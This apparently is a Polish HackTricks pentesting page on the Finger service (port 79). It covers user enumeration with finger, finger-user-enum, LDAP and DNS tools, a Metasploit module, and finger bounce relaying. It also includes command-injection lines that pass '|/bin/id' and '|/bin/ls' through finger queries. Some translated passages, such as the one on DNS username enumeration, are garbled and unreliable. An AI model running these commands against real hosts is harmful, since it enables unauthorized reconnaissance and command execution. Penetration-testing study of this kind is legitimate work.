hacktricks/network-services-pentesting/pentesting-finger.md

120 lines
6.7 KiB
Markdown
Raw Normal View History

2024-02-11 01:46:25 +00:00
# 79 - Testowanie penetracyjne Finger
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 01:46:25 +00:00
## **Podstawowe informacje**
2024-02-11 01:46:25 +00:00
Program/usługa **Finger** służy do pobierania informacji o użytkownikach komputera. Zazwyczaj dostarczane informacje obejmują **nazwę użytkownika, pełne imię** i w niektórych przypadkach dodatkowe szczegóły. Te dodatkowe szczegóły mogą obejmować lokalizację biura i numer telefonu (jeśli dostępne), czas logowania użytkownika, okres bezczynności (czas bezczynności), ostatnią chwilę odczytu poczty przez użytkownika oraz zawartość plików planu i projektu użytkownika.
2024-02-11 01:46:25 +00:00
**Domyślny port:** 79
2022-05-08 23:13:03 +00:00
```
PORT STATE SERVICE
79/tcp open finger
```
2024-02-11 01:46:25 +00:00
## **Egzaminacja**
2024-02-11 01:46:25 +00:00
### **Pobieranie baneru/Podstawowe połączenie**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
2024-02-11 01:46:25 +00:00
### **Wyszukiwanie użytkowników**
Wyszukiwanie użytkowników to proces identyfikowania i zbierania informacji o użytkownikach w celu uzyskania dostępu do systemu. Poniżej przedstawiam kilka technik, które można wykorzystać do przeprowadzenia takiego procesu.
#### **1. Finger**
Finger to protokół, który umożliwia uzyskanie informacji o użytkownikach z serwera. Można go wykorzystać do wyszukiwania użytkowników na zdalnym systemie. Aby użyć protokołu Finger, wystarczy wysłać zapytanie do serwera, podając nazwę użytkownika. Serwer odpowie, udostępniając informacje o użytkowniku, takie jak nazwa, opis, adres e-mail itp.
Aby przeprowadzić wyszukiwanie użytkowników za pomocą protokołu Finger, można użyć narzędzi takich jak `finger` lub `finger-user-enum`. Przykład użycia narzędzia `finger-user-enum`:
```
finger-user-enum.pl -U /path/to/usernames.txt -t <target>
```
Gdzie `/path/to/usernames.txt` to ścieżka do pliku zawierającego listę nazw użytkowników, a `<target>` to adres IP lub nazwa domenowa zdalnego systemu.
#### **2. LDAP**
LDAP (Lightweight Directory Access Protocol) to protokół używany do zarządzania i dostępu do katalogów. Można go wykorzystać do wyszukiwania użytkowników w katalogach LDAP. Aby przeprowadzić wyszukiwanie użytkowników za pomocą protokołu LDAP, można użyć narzędzi takich jak `ldapsearch`. Przykład użycia narzędzia `ldapsearch`:
```
ldapsearch -x -h <target> -b "dc=<domain>,dc=<com>" "(objectClass=user)"
```
Gdzie `<target>` to adres IP lub nazwa domenowa serwera LDAP, a `<domain>` i `<com>` to odpowiednie wartości domeny.
2024-02-11 01:46:25 +00:00
#### **3. DNS**
2024-02-11 01:46:25 +00:00
DNS (Domain Name System) to system, który przypisuje nazwy domenowe do adresów IP. Można wykorzystać DNS do wyszukiwania użytkowników, sprawdzając, czy istnieją rekordy DNS dla określonych nazw użytkowników. Aby przeprowadzić wyszukiwanie użytkowników za pomocą DNS, można użyć narzędzi takich jak `dnsenum`. Przykład użycia narzędzia `dnsenum`:
```
dnsenum --enum -f /path/to/usernames.txt <target>
```
Gdzie `/path/to/usernames.txt` to ścieżka do pliku zawierającego listę nazw użytkowników, a `<target>` to adres IP lub nazwa domenowa systemu.
#### **4. Social Engineering**
Inżynieria społeczna to technika polegająca na manipulowaniu ludźmi w celu uzyskania poufnych informacji. Można wykorzystać inżynierię społeczną do uzyskania informacji o użytkownikach, takich jak nazwy użytkowników, adresy e-mail, numery telefonów itp. Przykłady technik inżynierii społecznej to phishing, pretexting, tailgating itp.
Wyszukiwanie użytkowników jest ważnym krokiem w procesie penetrowania systemów. Dzięki odpowiednim narzędziom i technikom można zidentyfikować użytkowników i wykorzystać te informacje do dalszych działań.
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
2024-02-11 01:46:25 +00:00
Alternatywnie można użyć **finger-user-enum** z [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), kilka przykładów:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
2024-02-11 01:46:25 +00:00
#### **Nmap wykonuje skrypt do wykonania za pomocą domyślnych skryptów**
2024-02-11 01:46:25 +00:00
### Metasploit używa więcej trików niż Nmap
2022-05-08 23:13:03 +00:00
```
use auxiliary/scanner/finger/finger_users
```
2022-05-08 23:13:03 +00:00
### Shodan
* `port:79 USER`
2024-02-11 01:46:25 +00:00
## Wykonanie polecenia
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
2022-05-08 23:13:03 +00:00
## Finger Bounce
2024-02-11 01:46:25 +00:00
[Wykorzystaj system jako przekaźnik dla finger](https://securiteam.com/exploits/2BUQ2RFQ0I/)
2022-05-08 23:13:03 +00:00
```
finger user@host@victim
finger @internal@external
```
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.
2022-04-28 16:01:33 +00:00
</details>